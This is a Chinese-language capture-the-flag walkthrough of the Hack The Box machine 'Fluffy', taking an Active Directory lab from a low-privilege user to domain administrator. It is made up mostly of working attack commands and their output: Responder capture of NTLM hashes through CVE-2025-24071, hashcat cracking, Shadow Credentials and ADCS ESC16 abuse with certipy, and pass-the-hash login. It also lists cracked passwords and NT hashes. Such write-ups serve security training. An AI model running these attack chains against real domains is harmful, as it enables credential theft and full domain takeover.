fluffy
1. user
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
1.1. 信息收集
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49678/tcp open unknown syn-ack ttl 127
49681/tcp open unknown syn-ack ttl 127
49698/tcp open unknown syn-ack ttl 127
49706/tcp open unknown syn-ack ttl 127
49739/tcp open unknown syn-ack ttl 127
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ldapsearch-ad.py -l 10.10.11.69 -t info
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=fluffy,DC=htb
[+] defaultNamingContext = DC=fluffy,DC=htb
[+] ldapServiceName = fluffy.htb:dc01$@FLUFFY.HTB
[+] naming_contexts = ['DC=fluffy,DC=htb', 'CN=Configuration,DC=fluffy,DC=htb', 'CN=Schema,CN=Configuration,DC=fluffy,DC=htb', 'DC=DomainDnsZones,DC=fluffy,DC=htb', 'DC=ForestDnsZones,DC=fluffy,DC=htb']
配置hosts
1.2. 基本策略
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ldapsearch-ad.py -l 10.10.11.69 -d fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -o fluffy.htb_discover_all.log -t all
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=fluffy,DC=htb
[+] defaultNamingContext = DC=fluffy,DC=htb
[+] ldapServiceName = fluffy.htb:dc01$@FLUFFY.HTB
[+] naming_contexts = ['DC=fluffy,DC=htb', 'CN=Configuration,DC=fluffy,DC=htb', 'CN=Schema,CN=Configuration,DC=fluffy,DC=htb', 'DC=DomainDnsZones,DC=fluffy,DC=htb', 'DC=ForestDnsZones,DC=fluffy,DC=htb']
### Result of "trusts" command ###
### Result of "pass-pols" command ###
[+] Default password policy:
[+] |__ Minimum password length = 7
[+] |__ Password complexity = Disabled
[*] |__ Lockout threshold = Disabled
[*] |__ Password history length = 24
[+] |__ Max password age = 42 days, 0 hours, 0 minutes, 0 seconds
[+] |__ Min password age = 24 hours, 0 minutes, 0 seconds
[+] No fine grained password policy found (high privileges are required).
### Result of "admins" command ###
[+] All members of group "Domain Admins":
[*] Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Administrators":
[*] Administrator (DONT_EXPIRE_PASSWORD)
[+] All members of group "Enterprise Admins":
[*] Administrator (DONT_EXPIRE_PASSWORD)
### Result of "kerberoast" command ###
[*] ca_svc: ADCS/ca.fluffy.htb
[*] ldap_svc: LDAP/ldap.fluffy.htb
[*] winrm_svc: WINRM/winrm.fluffy.htb
### Result of "asreqroast" command ###
### Result of "goldenticket" command ###
[+] krbtgt password changed at 2025-04-17 16:00:02
1.3. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# bloodhound-python -c All -u j.fleischman -p 'J0elTHEM4n1990!' -d fluffy.htb -ns 10.10.11.69 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 27S
INFO: Compressing output into 20250525064207_bloodhound.zip
1.4. smb
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
[*] Initializing SMB protocol database
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/…/htb/season8/fluffy/CVE-2025-24071_PoC]
└─# smbclient -U 'j.fleischman%J0elTHEM4n1990!' //10.10.11.69/IT
smb: \> ls
. D 0 Sun May 25 08:59:17 2025
.. D 0 Sun May 25 08:59:17 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 316 Sun May 25 08:54:47 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 316 Sun May 25 08:55:15 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
里面可以获取到IT部门的一个安全漏洞通知,(大致就是说系统有以下漏洞,然后叫你这个部门修复漏洞、打补丁)
1.5. CVE-2025-24071
CVE-2025-24071
GitHub - 0x6rss/CVE-2025-24071_PoC: CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
┌──(root㉿kali)-[~/…/season8/fluffy/CVE-2025-24071_PoC/CVE-2025-24071-msfvenom]
└─# sudo responder -I tun0 -v
# smb:上传expliot.zip
#触发漏洞
[SMB] NTLMv2-SSP Client : 10.10.11.69 [SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:4612b85423aed083:73B5B454A248166FB43F809FA59ACDBA:010100000000000000796ABF52CDDB01D23C68CA6AC569020000000002000800550030003100330001001E00570049004E002D00560044005A003600300030005500460046003200590004003400570049004E002D00560044005A00360030003000550046004600320059002E0055003000310033002E004C004F00430041004C000300140055003000310033002E004C004F00430041004C000500140055003000310033002E004C004F00430041004C000700080000796ABF52CDDB01060004000200000008003000300000000000000001000000002000009850210C3B697422BCA38C6B2216E754DBFB52DA16AAC86C61528CEE298FC1640A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310035000000000000000000
P.AGILA::FLUFFY:4612b85423aed083:73b5b454a248166fb43f809fa59acdba:010100000000000000796abf52cddb01d23c68ca6ac569020000000002000800550030003100330001001e00570049004e002d00560044005a003600300030005500460046003200590004003400570049004e002d00560044005a00360030003000550046004600320059002e0055003000310033002e004c004f00430041004c000300140055003000310033002e004c004f00430041004c000500140055003000310033002e004c004f00430041004c000700080000796abf52cddb01060004000200000008003000300000000000000001000000002000009850210c3b697422bca38c6b2216e754dbfb52da16aac86c61528cee298fc1640a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000:prometheusx-303
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:4612b85423aed083:73b5b454a248166fb4...000000
Time.Started.....: Sun May 25 14:24:01 2025 (0 secs)
Time.Estimated...: Sun May 25 14:24:01 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 26485.8 kH/s (2.54ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4718592/14344387 (32.90%)
Rejected.........: 0/4718592 (0.00%)
Restore.Point....: 3145728/14344387 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: tomabossu -> peque帽obey
Hardware.Mon.#1..: Temp: 47c Util: 0% Core:1890MHz Mem:7001MHz Bus:8
┌──(root㉿kali)-[~/…/season8/fluffy/CVE-2025-24071_PoC/CVE-2025-24071-msfvenom]
└─# nxc smb 10.10.11.69 -u p.agila -p 'prometheusx-303'
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.69 445 DC01 [+]fluffy.htb\p.agila:prometheusx-303
1.6. Shadow Credentials
执行此攻击需要满足三个条件
- 处于一个支持 PKINIT,且域控版本大于win2016
- 域控制器拥有自己的密钥对(只要开启AD-CS 或者存在CA 即可满足)
- 可以编辑受害用户的
msDS-KeyCredentialLink属性的账户
这里前两个条件都满足,通过bloodhound分析也可以发现:
p.agila 用户对 这三个SVC用户有 GenericWrite 那么可以更改其 msDS-KeyCredentialLink 属性,则条件3也满足了。
那么就可以进行 Shadow Credentials 攻击获取其账号hash
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account WINRM_SVC -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7'
[*] Adding Key Credential with device ID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '43bf6798-ad4a-5adf-82b5-02d1b3e9a7f7' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
利用winrm_svc用户的hash即可登录上去拿user了
*Evil-WinRM* PS C:\users\winrm_svc\desktop> type user.txt
a30df7f4961e6d26898035d508f23f44
再拿一下这个ca_svc的hash,后面用得到
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account CA_SVC -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'afcb3015-3d42-459e-3a99-b492233651a2'
[*] Adding Key Credential with device ID 'afcb3015-3d42-459e-3a99-b492233651a2' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'afcb3015-3d42-459e-3a99-b492233651a2' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
从图中可以发现,后面大概率是要走这个ADCS的
2. root
2.1. AD-CS-ECS16
之前用nxc检测发现是有证书服务的
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# nxc ldap 10.10.11.69 -u ca_svc --hash ca0f4f9e9eb8a092addf53bb03fc98c8 -M adcs
LDAP 10.10.11.69 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP 10.10.11.69 389 DC01 [+] fluffy.htb\ca_svc:ca0f4f9e9eb8a092addf53bb03fc98c8
ADCS 10.10.11.69 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.69 389 DC01 Found PKI Enrollment Server: DC01.fluffy.htb
ADCS 10.10.11.69 389 DC01 Found CN: fluffy-DC01-CA
使用 certipy 进行枚举,可以枚举出存在ECS16
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad find -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
先检测 StrongCertificateBindingEnforcement 的值,它的值取决于我们利用那种方式进行 ECS16的利用
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> Get-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Kdc" -ErrorAction SilentlyContinue
Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Name Property
---- --------
Kdc DependOnService : {RpcSs, Afd, NTDS}
Description : @%SystemRoot%\System32\kdcsvc.dll,-2
DisplayName : @%SystemRoot%\System32\kdcsvc.dll,-1
ErrorControl : 1
Group : MS_WindowsRemoteValidation
ImagePath : C:\Windows\System32\lsass.exe
ObjectName : LocalSystem
Start : 2
Type : 32
StrongCertificateBindingEnforcement : 0
这里用的值是0,那么我们用第一种方式 ESC16 > 2.1. 方式1:结合 UPN 操纵 (需要域控制器处于兼容模式)
步骤 1:读取受害者账户的初始 UPN(可选——用于恢复)。
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-05-25T18:31:38+00:00
第 2 步:将受害者账户的 UPN 更改为目标管理员的 sAMAccountName
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
第 3 步:(如有必要)获取“受害者”账户的凭证(例如,通过影子凭证)
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# ntpdate 10.10.11.69;certipy-ad shadow -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'bff58174-965a-d510-ca58-0e138d8b2568'
[*] Adding Key Credential with device ID 'bff58174-965a-d510-ca58-0e138d8b2568' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'bff58174-965a-d510-ca58-0e138d8b2568' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
步骤 4:从 ESC16-vulnerable CA 的任何合适的客户端认证模板(例如,“用户”)请求一个作为“受害者”用户的证书。
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# export KRB5CCNAME=ca_svc.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad req -k -dc-ip 10.10.11.69 -target DC01.fluffy.htb -ca fluffy-DC01-CA -template User
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 18
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
步骤 5:恢复“受害者”账户的 UPN。
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad account -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy
[*] Successfully updated 'ca_svc'
步骤 6:以目标管理员身份进行身份验证。
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
2.2. PTH
┌──(root㉿kali)-[~/Desktop/htb/season8/fluffy]
└─# evil-winrm -i 10.10.11.69 -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
79177fb50dc520d6000139fdb4f33ce5
*Evil-WinRM* PS C:\users\winrm_svc\desktop> type user.txt
a30df7f4961e6d26898035d508f23f44
感谢 @sunset 师傅的提示,卡ECS16好久了(这洞有点新,要最新版本的 certipy 才能检测出来